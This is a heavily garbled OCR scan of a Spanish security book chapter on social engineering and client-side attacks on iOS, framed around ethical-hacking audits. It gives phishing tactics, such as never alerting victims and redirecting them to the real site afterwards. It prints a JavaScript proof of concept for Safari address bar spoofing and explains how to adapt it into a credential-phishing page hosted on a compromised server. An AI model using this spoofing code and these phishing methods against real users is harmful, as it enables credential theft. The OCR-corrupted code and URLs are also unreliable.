t*|  Ecnclim  ataje  <sB81  t^XesJ  ’ 
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9.  Conclusión 


Este  capítulo  lia  explícailí}  cómo  adaptar  uji  exploit  utilizado  para  h^ica:  JúUtfrenk  en  termmales  iOS 
remotamente  para  crear  una  herramienta  de  peuLcsLing.  Por  desgracia  solo  es  funcional  en  terminales 
con  versiones  iiifeiiores  a  ¡OS  4.3  por  lo  que  solo  podrá  usarse  con  ellos.  Xo  obstante,  este  mismo 
trabajo  puede  extrapolarse  a  próximos  exploiis  que  sean  descubiertos  y  que  afecten  al  navegador. 
Intbrrnación  de  todos  ios  c^xploíts  públicos  eíínucidt)^  pueden  localizarse  lioy  en  día  en  The  íFhoFw 
Wíkí:  h  iip://the¿pb  onewiki,  com/. 
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Capítulo  IX 

Ingeniería  social  y  client-side  en  iOS 


1.  Ingeniería  social 

La  ingeniería  yueial  es  la  vía  o  medio  por  el  que  nsuarios  non  fines  maliciosos,  también  denominados 
de  i  ÍTi  cuentes,  manipuian  a  todo  tipo  de  usuarios  con  el  ñn  de  lograr  acceso  ilícito  a  información 
sensible  de  dicho  usuario.  Esta  intbnnacíón  puede  ser  desde  una  escalada  de  privilegios,  credenciales, 
acceso  no  autorizado  a  ciertos  recursos,  Huplanludones  de  identidad,  etecicra. 

La  ingeniería  social  tiene  como  principio  elemental  que  en  todo  sistema  la  parte  más  débil  es  el  propio 
usuario.  Hoy  en  día  las  nuevas  tecnologías  tbmian  parte  de  la  vida  de  las  personas,  y  con  mayor  o 
menor  preparación,  todo  el  mundo  utiliza  medios  telemáticos  con  los  que  pueden  ser  engañados. 
Además,  la  irrupción  en  el  mercado  de  los  SmartPhones  ha  marcado  un  antes  y  un  después  en  el 
consumo  de  estos  dispositivos.  El  mercado  marca  las  reglas,  y  todo  hace  indicar  que  cl  volumen  de 
SmurtPhones  será  íTiucho  mayor  que  el  de  los  equipos  personales  u  ordenadores.  Por  esta  razón  se 
debe  eoncieneiar  a  todos  los  usuarios  que  manejen  este  tipo  de  dispositivos  en  las  empresas. 

Los  medios  comúnmente  utilizados  por  el  ingeniero  social  o  usuario  malicioso  son  el  teléfono  e 
Internet,  En  ciertas  auditorías  de  Eíhical  Hacking  se  utilizan  ataques  dirigidos,  en  las  fases  de  APX 
Advanced  Persístení  Th^at,  con  el  fin  de  comprobar  el  nivel  de  concienciación  de  empleados.  El 
ingeniero  social  puede  utilizar  técnicas  como  son  la  supla  litación  de  sitios  web,  envío  de  niails 
spoofeados  con  peticiones  de  acceso  a  algún  sitio  en  concrcLo  donde  se  deba  introducir  credenciales, 
envío  de  SMS  falsos  con  enlaces  a  sitios  web  bajo  el  control  del  usuario  malicioso,  etcétera.  Este 
tipo  de  técnicas  han  avanzado  y  evolucionado  en  gran  medida,  se  encuentran  muy  optimizadas  y 
cualquiera  podría  caei  en  ellas.  Este  hecho  hace  que,  a  día  de  hoy,  diferenciar  la  web  falsa  ophishmg 
sea  realmente  ílifícil  para  im  usuario  con  nivel  medio.  Además,  cabe  destacar  que  la  infonnática 
es  utilizada  en  su  inmensa  mayoría  por  usuarios  con  nivel  básico  o  medio,  lo  cual  hace  que  la 
informática  sea  imprescindible  para  todos,  y  por  otro  lado  hace  que  el  peligro  del  desconocimiento 
aceche  a  estos  usuarios. 

Generalmente  ios  usuarios  disponen  de  un  comportamiento  predecible,  es  decir,  realizan  acciones  de 
manera  automatizada  cuando  acceden  a  ciertas  páginas  web,  por  lo  que  si  este  no  loma  las  medidas 
adecuadas,  puede  ser  estafado  vía  Internet.  Como  ejemplo  se  puede  entender  un  phishing  de  la 
página  web  de  un  banco,  en  el  que  tras  introducir  sus  credenciales  se  redírige  ai  banco  original  o  se 
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alcTlL:,  TTiütli^Tiíjc  una  not.i  fie  ación,  de  que  el  sitio  web  no  se  encuentra  disponible  en  este  momento. 
Hoy  en  día  este  simple  hecho  sigue  ñiiicionando  y  provocando  las  pesadillas  de  algunos  usuarios  que 
han  caido  en  esta  clásica  tiampa.  Los  phishing  han  evolucionado  y  ya  aparecen,  con  gran  calidad, 
en  los  dispositivos  móviles,  incluso  embebidos  en  algunas  aplicaciones  con  millones  de  osuarios,  lo 
que  hace  reñexionar  sobre  la  calidad  de  dichas  aplicaciones. 

Uno  de  los  ataques  jnás  comunes,  y  también  más  sencillos,  e  incluso  erecLívus,  es  engañar  a  un 
usuario  para  que  piense  que  un  sistema  le  está  solicitando  su  credencial  de  acceso  para  ciertas 
acciones.  Hoy  en  día  es  difícil  librarse  de  este  tipo  de  ph!s¡¡i?ig,  que  en  muchas  ocasiones,  son 
despreciados  por  el  simple  hecho  de  ser  repetitivo.  El  típico  phishing  de  credenciales  de  cuentas 
do  báñeos,  lárjoLas  do  ercdiLo,  oLcctcra,  es  muy  común,  pero  no  significa  que  ya  no  sea  efectivo. 
Este  tipo  de  phishmg  enviado  de  manera  masiva  puede  proporcionar  un  raño  de  éxito  bajo,  pero 
suficiente  para  el  delincuente.  Por  este  hecho,  los  bancos  y  propietarios  de  este  tipo  de  sislemás 
advierten  perióHicainente  s.  los  usuarios  para  que  no  revelen  ningún  tipo  de  información  sensible 
ante  estas  peticiones,  ya  que  este  tipo  de  información  no  se  solicita  por  estas  vías. 

La  clonación  de  obiotos  que  identifiquen  cierto  sitio  web  puede  provocar  el  éxito  del  fhlshing,  y 
de  la  luisina  maiicra  ocurre  con  los  dÍHp<jsiüvos  móviles.  Los  sitios  web  suden  ser  más  sencillos  y 
con  menor  cantidad  de  objetos,  optimizados  para  dispositivos  móviles.  Por  este  motivo  el  phishing 
p  ued  e  ms  ultar  m  ás  sen  c  i  1 1  o  y  ere  ib  1  e . 

Otro  de  los  métodos  clásicos  de  la  ingeniería  social  es  e!  uso  de  los  archivos  adjuntos  en  emails^  en 
los  que  se  ojfrece  fotos,  aplicaciones,  por  ejemplo  un  IPAcon  el  perfil  de  instalacióiq  documentos 
ofiniáticos  los  cuales  pueden  provocar  la  ejecución  de  código  malicioso,  cicctcra..  Otra  vía  es 
pnivccar  la  insLálación  de  un  perfil  para  dispositivos  móviles,  por  ejemplo  en  íOS,  tras  la  visita  de 
un  sitio  web  que  suplante  al  sitio  corporativo.  L1  objetivo  de  la  instalación  de  dicho  peifil  puede  ser 
la  obtención  de  los  LhDID,  MEJ,  y  otros  identlficadores  o  inforinacióo  del  usnarío  que  pueda  dar 
algún  vuhjr  a  dicha  acción. 

Por  otro  lado  cuando,  mediante  la  ingenieria  social,  se  consigue  troyanizar  un  dispositivo,  ya  sea  un 
equipo  o  un  dispositivo  móvil,  este  pasa  a  formar  parte  de  una  botneí.  Hoy  en  día  empiezan  a  ser 
muy  frecuentes  y  reales  las  botnet  de  dispositivos  móviles,  las  cuales  pueden  manejar  mformacióu 
aón  más  privada  que  la  encontrada  en  los  equipos.  Esta  via  de  ataque  es  muy  frecuente,  y  aunque 
puede  que  el  ratio  de  éxito  sea  baio,  al  realizar  en  oleadas  de  spam^  se  puede  lograr  una  caiiLidad 
irriptírtáíUc  de  dispositivos  troyanizados.  ^ 

Históricamente,  y  como  se  puede  visualizar  en  gran  cantidad  de  películas  con  temática  hacker, 
la  ingeniería  social  presenta  su  cara  más  espectacular  en  el  tiato  personal  con  los  usuarios,  con  el 
que  se  puede  obLencr  acceso  a  los  sistemas.  Es  importante  conocer  a  la  víctima,  su  rol,  su  edad,  su 
concienciación,  su  puesto  de  trabajo,  etcétera.  Cuanto  mayor  detalle  más  pto habilidades  de  éxito,  ya 
que  el  conocimiento  siempre  dará  ventaja  al  ingeniero  social, 

Paia  subir  el  rallo  de  éxito  en  los  álaqucs  de  ingeniería  síx:ia!  en  audi Lorias  se  debe  tener  en  cuenta  la 
confianza  dd  usuario  sobre  la  entidad,  un  nivel  aceptable  en  la  falsificación  presentada,  introducción 


Capkulü  IX.  Ingemetia  social  y  cUent-side  en  iOS 


187 


de  objetos  que  ayuden  a  aumentar  la  cunfiarza  del  usuario,  como  puede  ser  el  protocolo  HTTPS, 
imágenes  con  el  caníhilo  de  zona  segura,  optnnización  del  recurso  para  los  dispositivos  móviles, 
uua  historia  con  gancho  como  pueden  ser  los  típicos  concursos  navideños  en  las  empresas,  etcétera. 
Lü  ningún  caso  se  debe  dejar  niiigún  mensaje  al  iisnario  de  que  ha  sido  victima  de  mipkíshing,  una 
buena  solución  cs  rcdirlgir  al  sitio  reaJL  o  a  un  recurso  que  no  existe  con  el  fin  de  que  este  piense  que 
el  sitio  web  se  encuentra  friera  de  sendeio  tenipoialmenie, 

C1  ingeniei'o  social  mas  famoso  es  Kevin  Münick,  y  para  él  esta  técnica  se  basa  en  cuatro  priadpios 
fundamentales  como  son: 

-  Todo  el  mutido  quiere  ser  atento  y  anudar. 

“  Al  ser  humano  no  le  gusta  tener  que  decir  que  ñor 

-  La  confianza  es  la  base  del  ataque, 

-  A  todo  d  mundo  le  gusta  ser  alabado . 


2.  La  famosa  address  bar  de  Safari 

¿Pí>r  qué  es  famosa  la  address  baráe\  navegadoipor  defecto  ác  iOS?  Realmente  por  nada  bueno.  La 
barra  de  direcciones  del  navegador  tic  iOS  indica,  como  otras  barras  de  navegación  en  que  sitio  web 
se  encuentra  el  usuario  actualmente.  ¿Se  puede  modificar?  La  respuesta  es  sí,  se  Im  podido  modificar 
en  ver Ilíones  anteriores  de  lOS,  y  lo  más  curioso  de  la  historia  es  que  este  tipo  de  spooj7J7g  se  resiste 
a  desaparecer  en  las  versiones  más  niodcmas  de  iOS. 


Jixiste  una  vulnerabilidad  que  permite  que  dispositivos  iOS  con  ciertas  versiones  del  sistema 
opeiativo  sean  engañados,  es  decir,  que  la  direcc^ión  URL  que  la  address  hai^  anuncie  o  indique  no 
sea  la  verdadera  dirección  donde  el  terminal’  se  ha  cottcclado.  Fste  hecho  es  realmente  interesante  y 
abre  una  vía  a  la  ingeniería  social  en  los  dispositivos  iOS,  Lo  interesante  de  este  hecho  es  que  esl¿/ 
vía  es  realmente  novedosa  y  avanzada,  ya  que  los  usuarios  de  no  pensarán  en  ningún  momento 
que  ia  address  bar  les  está  engañando. 


Imagen  09.01:  Itarra  de  direcciones  eii  Safari Ji^tr  ¿OS, 
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¿Qué  es  el  address  bar  spoofing? 

Im  técnica  de  address  har  la  suplantación  de  la  barra  de  direcciones  en  los  iiavegadMii 

El  objetivo  es  fáeilniente  imaginable  engañar  al  usuaiio  haciéndole  creer  que  í^e  encuentra  en  un  siiS 
en  el  cual^  cuando  realmente  se  encuentra  en  t^tro  stiio  v/cb.  Este  tipo  de  técnica  es  utilizada  en  ciertos 
esquemas  de  ataques  phishmg,  en  los  que  im  usuario  tnalicioso  intentará  robar  credenciales  u  otro 
tipo  de  información  haciendo  pensar  al  usuano  legítimo  que  se  eocueulra  en  el  sitio  adecuado. 


En  otras  palabras  la  addrvss  bar  spoqñrig  es  provocada  por  unas  líneas  de  código  malicioso  que 
modiíica  el  contenido  de  ía  barra  de  direcciones  dd  navegador  de  un  usuario  para  forzar  al  propio 
navegador  a  cargar  una  página  web  a  elección  del  usuario  malicioso.  Esta  suplantación  de  la  barr^ 
de  direcciones  se  lleva  a  cabo  mediante  la  ejecución  de  un  senpi.  el  cual  elimina  el  conienido  de 
barra  de  direccioiiés  del  navegador  y  lo  fiUvStituyc  por  otro,  el  cual  es  elegido  por  el  atacante. 

Como  se  puede  entender  de  estas  definiciones  la  idea  es  sencilla,  sí  el  navegador  es  vulnerable  se 
podrá  realizar  dicha  acción  con  el  ñn  nialicioso  de  realizar  un phishing,  casi  perfecto.  Generalmente, 
es  la  barra  de  direcciones  la  que  da  el  primer  síntoma  de  sitio  web  falso  aun  nsuarío,  ya  que  se  puede 
encontrar  una  dirección  IP  o  un  nombre  de  dominio  que  no  corresponde  con  el  sitio  web  real.  Con 
cHta  técnica,  phishfngtomH  una  cara  nueva,  yaque  aparentemente,  la  barra  de  direcciones  no  suele 
engañar  al  usuario  real  de  donde  se  encuentra. 


Historia  en  iOS  y  OS  X  de  este  tipo  de  vulnerabilidades 

Vulnerahiliríades  del  tipo  addf^ess  bar  spoofing  en  los  díspositivus  de  Apple^  ya  senn  equipos  o 
dispositivos  móviles,  no  son  nuevos.  Hisióriearnenlc  se  puede  enconrrar  algún  que  otro  caso,  tanto 
para  los  equipos  Mac,  como  para  los  dispositivos  iOS. 

En  el  caso  dcl  navegador  Safan  para  Mac  OS  Jí,  k  vei-sióii  5JA  solucionaba  ^3  vulncmhilidades 
en  eí  software,  entre  las  que  se  incluía  una  que  permitía  a  iin  atacante  modificar  el  contenido  de  la 
barra  de  direcciones.  De  cate  modo  un  usuario  podría  ser  fácilmente  engañado  niedimite  el  uso  de 
dicho  navegador 

Hoy  en  día  los  navegadores  w^eb  no  permiten  que  los  sitios  web  modifiquen  el  texto  que  aparece 
en  la  barra  de  direcciones,  y  es  bastante  lógica  su  razón.  En  algunos  casos  los  navegadores 
pueden  permitir  a  ventanas  emergentes  ocultar  la  ban'a  de  direcciones,  pero  en  tales  casos  la  URL 
se  mostrará  en  el  título  de  la  ventaría.  La  razón  de  dichas  acciones  o  de  este  compoitamiento  es 
sencilla,  si  los  navegadores  pudieran  ser  influenciados  por  las  aplicaciones  web  que  muestran  para 
ocultar  la  dirección  URL  o  modificar  el  contenido  de  dicha  barra  de  direcciones,  las  aplicaciones 
web  maliciosas  podrían  falsificar  fácíhiiente  las  direcciones  IfRL  y  engañar  a  los  usuarios.  Sería  un 
vector  de  ataque  enomie  para  el  phíshmg  y  lo  peor  sería  que  resultaría  sencillo  engañar  al  usuai  io. 

En  el  sistema  operativo  íOS,  antes  de  que  una  grave  vulnerabilidad  de  address  bar  spoofi/ig  fuera 
explotada  en  la  versión  5,  se  conocía  una  prueba  de  concepto  del  investigador  ?diesh  Dhanjati  con 
la  que  se  realizaba  un  phishing  sencillo  de  la  barra  de  direcciones  pero  muy  peligroso. 
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La  ¡[lea  era  muy  sencilla  empujar  la  barra  de  direcciones  ñiera  del  área  visible  del  usuario,  ¡y  esr»  se 
podía  hacer  en  un  lOSl  La  respuesta  es  afirmativa.  Mientras  que  ios  navegadores  intentan  informar 
correctamente  en  qué  página  se  encuentra  el  usuario,  un  dispositivo  ¡OS,  por  decisión  de  diseño, 
pemnitía  al  programador  del  sitio  web  empujar  la  barra  de  direcciones  fuera  de  la  zona  visible  por  el 
usuario.  L1  objetivo  no  era  otro  que  generar  un  mayor  espacio  útil  en  la  pantalla  del  dispositivo.  Lste 
hecho  estaba  dando  lugar  a  un  vector  de  ataque  muy  peligroso,  orientado  al  phishíng. 

El  investigador  explicó  en  el  ano  2010  como  era  siiílciente  empujar  hacia  arriba  la  baria  de 
direcciones  dejándola  fuera  de  la  vista  del  usuario  y  "'pintar’  una  nueva  barra  de  direceiones  falsa 
con  el  nombré  del  sitio  web  que  se  quería  suplantar.  Este  hecho  tan  simple  como  peligroso  ftie  uno 
de  los  primeros  ataques  de  la  técnica  addres^  bar  spoojlng  que  se  explica  en  este  capítulo.  En  la 
imagen  se  puede  visualizai^  este  problema.  Fn  el  iPhone  de  la  izquierda  se  puede  visualizar  como  se 
obtenía  ciphíshlng  realmente^  la  barra  de  direcciones  es  total  mente  falsa,  mientras  que  eii  el  iPhune 
de  la  derecha  se  puede  visualizar  lo  que  está  ocuiriendo  realmente,  la  barra  de  dircceioTics  real  es 
desplazada  hacia  arriba  quedando  ñiera  del  área  visual  del  usuario. 


Iiuagen  09.02:  Ej  ctnplo  de  phishing  del  invcfidgador  Dhíinjan  tín  el  aní)  2010* 

En  marzo  de  2012  David  Viera-Kurz  publicaba  una  nueva  forma  de  realizar  un  ataque  de  addmss 
bar  spoüfing  en  dispositivos  ¡OS.  Este  ataque  afectaba  al  que  por  entonces  era  el  nuevo  ñamante 
sistema  operativo  móvil  de  Apple,  iOS  5.  Este  ataque  afectó  hasta  la  versión  5./,  parcheándose  en  la 
versión  5.7. 1  para  la  cual  ya  no  es  válido  el  ataque  de  address  bar  spoo/Ing.  No  es  válido  en  todo  su 
esplendor,  porque  realmente  lo  que  se  consigue  es  que  la  ba:  ra  de  direcciones  se  quede  en  blanco,  lo 
cual  puede  no  ayudar  mucho  a  evitar  el phishírrg  en  un  usuario  no  avanzado. 
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/,Eii  qué  consistía  el  ataque?  El  fallo  o  vulnerabilidad  se  produce  por  la  existencia  de  un  error  en  la 
ejecución  de  la  furiciÓT]  Windows MpEnf)  ]::^v\JavaScrípi,  La  íinplemeiitacióii  de  esta  función  deL4ü/;^c 
WehKft/334. 46  permite  realizar  este  ataque  en  el  navegador  de  iOS.  I  .a  vulnerabilidad  se  detalla  en  la 
siguiente  URL  http://www\majorsecurity.net/Sqfayi-5 1 4-iús5 l~ad\nsor}Kphp^  Como  curiosidad  cabe 
destacar  que  la  vnlncTabilidad  en  iOS  6  y  superior  sigue  mostrar! do  labaira  de  direcciones  en  blanco, 
por  lo  que  un  usuario  cualquiera  puede  caer  en  este plmhing  sin  darse  cuenta. 

Otra  de  las  curiosidades  de  las  que  iiitbnnó  el  investigador  David  Viera-Kmz  ñie  la  línea  temporal 
de  acorUccímientos  que  ocurrieron  desde  que  descubrió  este  address  barspoofin^: 

El  I  de  Mar/o  de  2012  se  identifica  la  vulnerabilidad  en  iOS  5.0,  ese  mismo  día  esa  misma 
\minerabiiidad  es  reproducida  en  la  versión  5J  de  iOS.  El  día  2  de  Marzo  de  2012  el  fabricante, 
es  decir,  Ápph  es  informado  de  diclio  fallo  de  seguridad.  El  día  3  de  Marzo  Apple  responde  ai 
investigador.  El  20  de  Marzo  de  2012  m  publica  un  advi'ior}^  con  dclallcs  parciales.  Apple  trabaja 
para  solventar  este  agujero  de  segimdad  y  el  7  de  Mayo  de  2012  liberan  un  parche  para  íOS  3.JJ 
que  solventaba  el  problema  de  la  address  bar  spooñiig.  El  día  S  de  Mayo  de  2012  íue  publicado  el 
adiñsory  con  Lodos  los  detalles  y  una  prueba  de  coucepLo  asociada. 


3.P0C:  Address  bar  spoofíng  en  iOS 

En  esta  prueba  de  concepto  se  presenta  uri  ejemplo,  publicado  por  el  investigador  David  Viera- 
Kiíí‘z,  donde  se  puede  visualizar  de  manera  gráfica  y  sencilla  el  funcionaníilento  de  la  técnica  en 
un  dispositivo  ¿OS.  El  dispositivo  que  se  utilizara  ea  un  iPhone,  tanto  3GS,  4  y  4S.  El  resultado  no 
dependerá  dcl  tli.spositivo  que  se  esté  utilizando,  pero  se  quiere  reflejar  que  valdría  con  cualquier  íipí) 
de  dispositivo  de  Apple,  no  excluyendo  al  iPad ni  al  W  Toi4ch. 

En  la  siguiente  dirección  URL  se  puede  encontrar  una  prueba  de  concepto  que  presenta  el  investigador 
mencionado  arteriomente  htíp://maJorse{^ñty.netd2tml5/íos5D¿Jern{}.htmL  En  este  sitio  \veh  se 
presenta  un  botón  que  debe  ser  pulsado  desde  un  dispositivo  iOS,  en  este  caso  im  iPhom^  para 
cargar  un  iframe  con  la  página  web  real  de  Apple,  pero  dicho  iframe  se  encuentra  embebido  en  un 
sitio  vt'cb  que  no  pertenece  a  Apple. 

Cuando  esta  prueba  de  concepto  se  realiza  con  una  versión  vulnerable  a  adáress  bar  spoofing,  la 
barra  de  direcciones  indicará  que  el  sitio  web  en  el  que  se  encuentra  el  usuario  es  el  sitio  web  de 
Apple^  lo  cual  mt  es  cierLo  ya  que  simpl emente  el  ífmme  embebido  en  el  sitio  web  se  encuentra  en 
dicha  web. 

Si  la  pmeba  de  concepto  se  realiza  con  un  iOS  superior  o  igual  a  la  versión  5  1.1  la  barra  de  dnecciones 
no  será  .spoofeada,  pero  aparecerá  en  blanco,  Este  hecho  no  a>'uda  al  usuario  a  evitar  el  spoqfing,  ya 
que  el  usuario  no  avanzado  puede  no  entender  el  significado  de  la  barra  de  direccitmes  en  blarieo. 


Oipiiulü  IX.  Ingeniería  social  y  clíent-side  en  ¡OS 


191 


Configuración  y  ejecución 

lin  primer  lugar  se  utilizaiú  un  iPhnnp.  con  iOS  5. i,  el  cual  es  vuilnerable  a  la  técnica  addi-ess  bar 
Sfjoüfiíig.  Arrancaudo  el  navegador  móvil  Safari  se  accederá  a  la  signicrile  dirección  URL  ¡ntp:// 
major.’íe.curíty.nc.t/htfnlS/iosSl-demo.himl  donde  se  podrá  visualizar  el  sido  web  que  se  muestra  en 
la  imagen. 


iTiifigKii  09.03:  Cuniitiüiío  de  laprní^ba  de;  concepio  út  David  yí^rú-Kurz 

Trd.s  visitas  este  sitio  web  se  muestra  un  ífmme  en  la  paite  iTifenor  que  carga  et  sitio  web  á^Appíe^ 
en  su  versión  de  habla  inglesa.  Para  enmen/ar  la  pmeba  de  concepto  se  debe,  desde  el  dispiJsíLivo 
pulsar  cii  el  boUm  que  indica  "'Demo’’,  l'i^  la  pulsación  en  dicho  botón  se  abrirá  lina  nueva 
pestaña  y  se  llegará  a  un  sitio  donde  se  suelve  a  cargar  un  iframe^  de  mayor  tamaño,  con  el  sitio  web 
de  sApplc  en  lengua  inglesa. 

Como  el  dispositivo  iOS  utilizado  dispone  de  un  sistema  operativo  con  versión  5J  se  obtiene  la 
dirección  http://\vw^\^. Appie.com  en  la  barra  de  direcciones. 

Cabe  destacar'  que  en  la  parte  <lc  arriba,  escrito  en  el  propio  código  HTML,  y  para  que  el  usuario 
pueda  visual  i /ar  claramente  que  se  encuentra  en  un  sitio  web  no  pcrlcnccicnlc  á  Apple,  se  escribe 
el  siguiente  texto:  "This  Is  stiU  hosied  on  Majar  Se  curityuieJ,  but  the  the  cídressbar  ¡5  hcín^  spoofed 
and  ís  pomüng  ío  cmaíher  FODN.  Scúty 

Con  csia  scriLcncia  se  quiere  demostrar  que  el  iframe  se  encuenda  realirientc  embebido  en  la  web,  y 
que  aunque  la  barra  de  direcciones  indique  que  el  usuario  ac  encuentra  en  el  sitio  web  de  Apple  este 
hecho  lio  es  cierto. 
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Si  se  accede  desde  un  iPhone^  o  dispositivo  iOS,  con  ima  versión  5JJ  del  sistema  uperaLivo  o 
superior  m>  se  podrá  ob tener  el  iiiisnio  nivel  de  confianza  por  paite  de  la  victima,  es  decir,  ci  usuario 
visualizará  una  barra  de  direcciones  en  blanco,  aunque  c1  phishmg  seguirá  siendo  cargado  en  el 
¡trame,  y  no  existirá  ninguna  notificación  que  pueda  alertar  al  usnano. 


El  sifíiplc  hecho  de  que  la  baira  de  direcciones  apai'ezca  en  blanco  no  alertará,  por  lo  general,  a  iin 
iisn^ric  no  avanzado,  Hay  que  recordar  que,  hoy  en  día,  la  mayoría  de  los  usuarios  de  las  nuevas 
tecnologías  no  son  usuarios  avanzados  y  este  hecho  puede  ayudar  a  que  el  iniento  de  phíshmg 
obtenga  e!  éxito  buscado  por  el  atacante. 


imagen  09.05:  SuDiaJitaciOn  útí  la  bauB  de  direGcibnes  en  iOS  5  f  ^  o  siiperípi- 
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4.P0C:  Personalizando  el  ataque 

Eli  esta  prueba  de  concepto  se  configuram  un  servidor  web  d  cual  realice  la  técnica  de  adíúess 
bm'  spapñng,  para  que  se  personalice  el  ataque  Lodo  lo  posible.  Se  realizara  la  configuración  de  un 
sitio  web  falso,  el  cual  fndn  al  visitante  alguna  credencial  y,  para  versiones  vulnerables  a  ía  técnica 
estudiada  en  este  capítulo,  se  presente  iiitbmiacíón  no  verdadera  en  la  baiTa  de  direcciones. 


Manos  a  la  obra 

Se  utilizará  un  servidor  WAIMP^  ya  que  el  sitio  web  malicioso  se  lia  preparado  en  sistemas  Microsoft 
Windows,  pero  se  podría  utilizar  un  servidor  LAMP.  para  sistemas  GNU/Limix,  o  ^L^VJVJ:p;  paia  llevar 
a  cabo  la  prueba  en  un  equipo  Mac  OS X. 

El  código  que  provoca  el  address  bar  spoofing  comentará  en  las  próximas  líneas,  es  recomendable 
entender  lo  que  realiza  dicho  código,  en  su  nmyoria  código  .JavaScript.  El  código  original  propuesta 
por  el  investigador  proporciona  al  usuario  iina  página  web,  que  dispone  de  un  bolón  que  al  pulsado 
realiza  la  técnica  de  addi-css  bar  spoofing.  ¿Por  qué  no  lanza  directmneFite  la  página  web  malicioso 
con  la  barra  falsificada?  En  primer  lugai  poique  ea  una  prueba  de  concepto  y  en  segundo  lugar 
debido  a  que,  geneialmejite,  los  navegadores  bloquearán  las  funciones  JaníScripI  que  intenten 
realizar  apeituras  de  nueva^s  ventanas  en  la  carga  de  un  sitio  web.  Se  puede  buscar  la  manera  de 
cunseginr  este  hecho  si  la  acción  íúem  para  realizar  una  acción  maliciosa,  hay  que  tenerlo  en  cuenLa, 

<.DOCTYJ:'h]  hTf^r.  Fnm.JC  ^^-//wacy/DTD  lIZML  4,ai//EU"> 

<htríil> 

<'n  f;. H  d  L  i- _e>Mob  Lie  Safari  IOS  5,1  -  Adreññ  bar  .‘^>pooiÍMy  poc</tÍ-^le> 

<m=ta  hr.t.p“eq-]i  v-"‘ccEiLGnL-typ&'''  content="text/htmL ;  ■rJ-iaríiet-i^jO^S855-l"> 

</head> 

En  esta  parte  inicial  de  eóíligo  se  puede  visualizar  como  se  pone  título  a  la  ventana  inicial.  Además  se 
coníigura  el  charset  y  la  cabecera  del  docuinenlo.  Se  podría  intentar  declarar  la  función  JavaScrípi 
de  carga  de  la  técnica  de  üddress  bar  <^poof¡ng  en  esta  parte  del  código  e  iiivocark  en  el  hody,  pero 
muy  pro  bable  men  Le  Safari  bloquearía  dicha  acción,  por  lo  que  habrá  que  buscar  otra  opción  para 
hacer  llegar  el  phíshing,  por  ejemplo  con  ingeniería  social. 

<bo¿y> 

<iÍL'_ri:5Pt> 

<  1  C9oniL>Some  pay[utir.L/ba.L3k  websi'ze  inr.! hfiro.  </legenci> 

<ol> 

<li>st=.rt  pci::<xTin7j>f::l_iLvlL  the  hutton  to  run  the  poc .  ^/.xmpxh-ir.-.or 
''>L&roc</bu‘ton></li> 

</ol  > 

c/fieldset> 

En  esta  parte  del  código  comienza  la  sección  body  del  sitio  web.  En  esta  parte  se  puede  visualizar 
como  se  indica  un  mensaje  '*Same  payment/hank  website  ínnluded  herú/\  con  este  mensaje  el 
investigador  da  ideas  sobre  para  que  se  puede  utilizar  esta  prueba  de  concepto  en  manos  maliciosas. 
Además,  se  incluye  un  botón  que  deberá  ser  pulsado  para  acceder  a  la  pnieba  de  concepto  en  sí. 
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Lo  más  sencillo  para  la  persona lización  de  esta  pmeba  de  concepto  es  generarse  una  página  similar 
con  un  botón  decorado  para  afianzar  la  confianza  del  usuario.  Otm  de  las  maneras  serla  hacer  que  ei 
código  JuvaSaipi  se  ejecute  en  la  carga  del  sitio  web,  quizá  la  mejor  manera  para  un  phíshmg  real. 

cscript  1:ype="' text/ j¿iv¿i3c:ript"> 

documenL  ,  geLH.lementHyid  ( 'One*" )  .onclic!-:  =  functicnO 
{ 

iTLyHiridüw-A-indüví ,  open  (  'http;  /  .  app'i  e  .  riomr/  ^  *  eint-.itp.l '  f  '' widt:h=200,  h«ight=lOO  r  lo 

c-.ttion=yoF;^  \ ; 

nyWindüw,  docutnect ,  write  í 

"<ht!nnX><near]x/he¿5d><body> 

<strong>This  is  atill  hosted  on  MajorS^curlLy h^Jt  r.hé  t.he 
&dre3^b¿ir  is  beiiig  üpooFad  and  in  painting  to  another  TuDM^  SCé.ry. 

</ st  rQnq> 

<br><b“> 

<iframe  src-\"http: //www.appl  e.ciomX"')  ;  ></if  rs^tné></script></body> 

</hl  ; 

rayWindaw.  focus  [}  r 

1 

</  sx:ripl.> 

En  esta  parte  del  código  se  visualiza  la  función  Jm^aScripi  con  la  q.üe-se_iealiza  realmente  la 
suplantación.  Cabe  destacar  en  primer  lugar  como  el  objeto  windaw^open  se  le  intlica  la  LtrL  que 
debe  asignar,  y  gracias  a  la  vulnerabilidad  esta  se  suplanta.  Con  la  instrucción  my{4‘itf4ow^doct4ment 
wf  ite  se  escribe  en  la  nueva  ventana  un  texto,  cí)n  el  que  el  mvcsLigadür  anunciaba  que  la  página  iio 
estaba  alojada  donde  la  barra  de  direcciones  indicaba  Y  por liltimo  la  instrucción  donde  se  inserta  el 
ifroine  apuntando  al  recurso  que  se  quiera  falsear.  En  este  caso  se  deberá  apuntar  al  sitio  web  falso, 
para  que  sea  cargado  en  dicho  ifFamft. 

Tras  explicar  el  código  original  de  la  prueba  de  concepto  se  va  a  proceder  a  la  modificación  pana 
preparar  la  pmeba  de  concepto  personalizada.  Se  creará  un  fichero  denominado pocJmnl  o  incluso, 
si  se  quiere  añadir  algo  con  lenguaje  PHTP  se  podría  crear  un  archivo  denominado poc.php.  En  esta 
parte  de  la  tase  de  ingeniería  social  toda  idea  con  imaginación  puede  ayudar  al  éxito  de  la  acción 
frente  a  la  víctima. 

Este  fichero, /7oc./3^/3,  se  incluirá,  por  ejemplo,  en  un  servidor  el  cual  ha  sido  hacheado  y  se  tiene 
acceso,  o  al  que  se  ha  subido  una  y  se  dispone  de  privilegios  para  subir  y  modificar  archivos 

de  un  sitio  web.  Otra  opción  es  utilizar  un  senddor  propio  en  el  que  se  publique  algo  conocido 
por  la  víctima.  El  atacante  quiere  utilizar  este  servidor  como  fuente  de  coiiíianza,  por  ejemplo, 
supóngase  que  se  hackea  una  web  de  una  famosa  marca  de  ropa,  la  cual  enlaza  con  un  banco  para 
realizar  un  pago  o  simplemente  enlaza  a  otros  sitios  w^eb  donde  se  necesita  incluir  un  usuario  y 
contraseña  para  acceder  a  una  zona  iuLcmu.  Es  esta  segunda  web,  y  no  la  de  la  famosa  marca  de  ropa, 
la  que  será  víctima  de  phíshmg^  y  ayaidándose  en  la  address  bar  spoofing,  engañar  al  usuario  que 
acceda  medíaxile  el  dispositivo  iOS.  Para  realizar  las  acciones  de  manera  procedimental  se  presenta 
el  siguiente  esquema: 


Capí  litio  IX.  Ingeniería  mcialy  ctieni^side  en  IOS 
